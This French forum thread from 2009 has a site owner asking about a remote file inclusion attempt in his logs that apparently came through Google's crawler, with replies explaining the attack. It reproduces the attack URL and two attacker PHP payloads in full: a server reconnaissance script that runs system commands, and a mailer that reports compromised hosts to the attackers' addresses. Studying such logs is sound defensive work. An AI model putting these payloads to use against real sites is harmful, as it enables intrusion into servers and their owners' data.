Google Me Hack?, Truc bizarre dans mes logs... Options

[krapno]

Bonjour,

Sauriez-vous expliquer ce log?

/index.php?page=http://nda.150m.com/id.txt
USERAGENT = [mediapartners-google]
IP = [66.249.72.237]
MASK = [crawl-66-249-72-237.googlebot.com]
REFERER = []

Contenu du fichier txt:

Code

<?php
function ConvertBytes($number)
{
        $len = strlen($number);
        if($len < 4)
        {
                return sprintf("%d b", $number);
        }
        if($len >= 4 && $len <=6)
        {
                return sprintf("%0.2f Kb", $number/1024);
        }
        if($len >= 7 && $len <=9)
        {
                return sprintf("%0.2f Mb", $number/1024/1024);
        }
  
        return sprintf("%0.2f Gb", $number/1024/1024/1024);
                          
}

echo "Osirys<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;


echo "Osirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

Bien cordialement,

[CybStup]

Bonjour,

Je vous l'ai expliqué dans le dernier message privé que nous avons échangé.
Il s'agit d'une tentative d'exploitation sur une vulnérabilité de type 'inclusion', ici RFI.
L'objectif étant de faire exécuter le code contenu dans votre fichier.

[krapno]

Bonjour,

Oui oui, je l'ai bien compris ne vous en faites pas.

Ma question ici porte plutôt sur fait que la source soit Google...
Comme si le bot de Google essayait de faire cette inclusion.

Bien cordialement,

[CybStup]

Effectivement, j'ai bien constaté qu'il s'agissait d'une requête ayant été effectuée par Google.
Je vois plusieurs explications possibles. L'hypothèse la plus plausible consiste à manipuler des services de Google pour s'en servir comme relais à leurs attaques.
Comme ça semble compliqué alors qu'il n'en est rien, voici une démonstration.

Le site monip.org vous indique votre adresse IP.
IP : x.x.x.x ; votre.isp
Pas de proxy détecté - No Proxy detected
Mais en utilisant le service Google Translate
IP : 74.125.16.68 ; 1.0 translate.google.com TWSFE/0.9
Proxy détecté / Proxy detected

Un exemple parmi tant d'autres.

edit: Dans votre cas, on peux imaginer un empoisonnement du cache, démonstration

Ce message a été modifié par CybStup - Jun 18 2009, 04:38 PM.

[krapno]

Bonjour,

Anéfé relativement simple...
Mais que fait la police??

Dans ce cas, Google peut-il y faire quelque chose?
Devons-nous directement les contacter?
J'imagine que ce n'est pas nouveau comme méthode.

Je me vois contraint de bannir l'ip de ce robot/service en attendant.

Bien cordialement,

[thibaut.l]

C'est donc une attaque automatisée, qui utilise un scanneur de faille d'inclusion écrit en php.Vous avez été victime d'un bot comme il en existe des milliers. Votre site a du être trouvé dans le tas de la recherche google. Les étapes qui suivront seront la sécurisation des dossier accessible via votre moteur de recherche.

fichier robots.txt
User-Agent: mediapartners-google
Disallow: /dossierfaillible

CybStup a sans doute du vous le dire.

[krapno]

Bonjour,

Mon fichier "robots.txt" est déjà renseigné pour les dossier interdits au référencement.

Mais ceci m'amène à la question suivante:
Si Google et les autres moteurs de recherche se fient à ce fichier pour ne pas indexer certains dossiers, c'est bien qu'ils peuvent le lire?
Donc un bot malveillant lui aussi peut lire se fichier et au contraire ne pas se gêner pour aller fouiner dans les dossiers qui y sont mentionnés non?

Bonne journée et cordialement,

PS: On trouve des emails dans certains fichiers:

http://www.grandao2000.xpg.com.br/tester.txt

Code

<?php

ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$email = "$user";
$assunto = "now-env";
$email1 = "[email protected],[email protected]";
$headers  = "From: <$email>\r\n";


if(mail($email1, $assunto, $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], $headers)){
echo "foi";
exit();
}
else{
echo "numfoi";
exit();
}
?>

On peut leur envoyer des insultes?

Ce message a été modifié par krapno - Jun 19 2009, 09:44 AM.

[CybStup]

Bonjour,

Non, Google ne fera rien, ce n'est pas utile de les encombrer avec des choses si peu importantes. Les insulter n'avancerait à rien, des lignes dans vos journaux, vous en aurez des milliers comme celle là. Bannir une adresse n'est pas la meilleure solution mais une alternative et bien garder en tête que dans des situations plus complexes, il peut y avoir des risques de représailles. Je rabâche souvent qu'Internet est un milieu hostile, c'est le cas. Il ne se passe pas une second de calme d'où l'importance d'apprendre à sécuriser ses installations. Il faut bien comprendre que le fichier d'exclusion des robots n'est pas une mesure de sécurité c'est tout au plus qu'une simple indication. Si vous utilisez Apache, commencez par définir les bons droits d'accès aux fichiers puis placer des restrictions en utilisant par exemple un fichier de configuration .htaccess . Si nécessaire et que vous savez exactement ce que vous faites, complétez avec des modules de sécurité. Dans votre message, la technique est similaire à la différence que si le code est exécuté celui-ci va en notifier l'attaquant en utilisant la fonction mail. Novice en administration ? Il existe des ouvrages spécialisés et pourquoi pas des formations, discutez en avec votre employeur quand vous lui apprendrez que votre site est régulièrement "assailli"

[krapno]

Bonjour,

Je vous remercie de votre éclaircissement et
vous souhaite une agréable semaine.

Cordialement,

[wow]

Bonjour à vous,

La réponse est ici.

http://eromang.zataz.com/2010/04/20/google...ng-web-attacks/

Cordialement